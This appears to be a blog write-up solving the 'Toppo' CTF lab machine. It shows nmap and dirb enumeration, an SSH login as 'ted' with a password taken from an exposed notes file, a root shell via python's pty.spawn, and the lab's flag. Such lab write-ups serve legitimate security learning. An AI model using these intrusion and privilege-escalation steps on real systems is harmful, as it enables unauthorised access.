Lab – Toppo

My pick for the first blog is a Toppo by Hadi Mene. Yes, I know there are many write ups but there’s no reason not make my own one! 

Toppo is an entry level machine, but we have to start somewhere, right?

Virtual machine boots and all we got is this login screen:


We can give it a try and guess a login and password, but usually it doesn’t work this way. Typical pentest or CTF lab starts with a discovery phase where we have to enumerate anything within our reach (and beyond):

root@kali:~# nmap -sV -sC -O -A
Starting Nmap 7.70 ( ) at 2019-05-13 08:46 EDT
Nmap scan report for
Host is up (0.00090s latency).
Not shown: 997 closed ports
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 ec:61:97:9f:4d:cb:75:99:59:d4:c1:c4:d4:3e:d9:dc (DSA)
| 2048 89:99:c4:54:9a:18:66:f7:cd:8e:ab:b6:aa:31:2e:c6 (RSA)
| 256 60:be:dd:8f:1a:d7:a3:f3:fe:21:cc:2f:11:30:7b:0d (ECDSA)
|_ 256 39:d9:79:26:60:3d:6c:a2:1e:8b:19:71:c0:e2:5e:5f (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Clean Blog - Start Bootstrap Theme
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 51422/tcp status
|_ 100024 1 51441/udp status
MAC Address: 00:0C:29:C7:DE:30 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1 0.90 ms

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 14.65 seconds

So what do we have so far:

  • SSH on a standard port with OpenSSH 6.7p1;
  • Web server with Apache 2.4.10;
  • RPC with rpcbind 2-4.

Web server looks promising here. Let’s check it with a browser:


Ok, it’s an empty blog template with zero active content. We can browse it, but no luck. Sometimes certain pages or folders on a web server do not have direct links from web pages, but that doesn’t mean that they aren’t accessible. It’s a very common security flaw, so it definitely is worth checking:

root@kali:~# dirb

DIRB v2.22
By The Dark Raver

START_TIME: Mon May 13 08:49:24 2019
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt



---- Scanning URL: ----
+ (CODE:200|SIZE:6437)
+ (CODE:200|SIZE:1093)
+ (CODE:403|SIZE:302)

---- Entering directory: ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

Wow, take a look, we’ve got some admin folder, let’s go there:


Bingo, it looks like someone left a note here. File notes.txt reads:


So we got a password, but it’s obviously useless without a login. Pentest is all about trial and error, and we can start bruteforcing a login right away. But this time I can make a guess – take a closer look at the password. Since the author of this note isn’t good with technology, my best guess is that his login is just “ted”. Let’s check our guess and login via SSH:

root@kali:~# ssh ted@
The authenticity of host ' (' can't be established.
ECDSA key fingerprint is SHA256:+i9tqbQwK978CB+XRr02pS6QPd3evJ+lueOkK1LTtU0.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '' (ECDSA) to the list of known hosts.
ted@'s password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Apr 23 09:14:25 2019 from
ted@Toppo:~$ id
uid=1000(ted) gid=1000(ted) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)

Yep, that’s it. We’re Ted now. Unfortunately, Ted doesn’t have any sufficient rights on this machine since he’s just a regular user. We have to escalate our privileges now. There is a bunch of techniques to do this under different circumstances and some of them work more other than another. Once again it’s a trial and error thing.  On this machine we see python installed, so let’s import a pty module and try to spawn a shell:

ted@Toppo:~$ python -c 'import pty;pty.spawn("/bin/sh")';
# id
uid=1000(ted) gid=1000(ted) euid=0(root) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)

It worked. Now let’s browse to a root directory for our flag:

# cd /root/
# ls
# cat flag.txt
| _ _ |
|_/ | | \_|.--. _.--. _ .--. . --.
| | / .'`\ \ ['/'`\ \ ['/'`\ \/ .'`\ \
_| |_ | \__. | | \__/ | | \__/ || \__. |
|_____| '.__.' | ;.__/ | ;.__/ '.__.'
[__| [__|

Congratulations ! there is your flag : 0wnedlab{p4ssi0n_c0me_with_pract1ce}

That’s it. Passion definitely comes with practice =)



Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: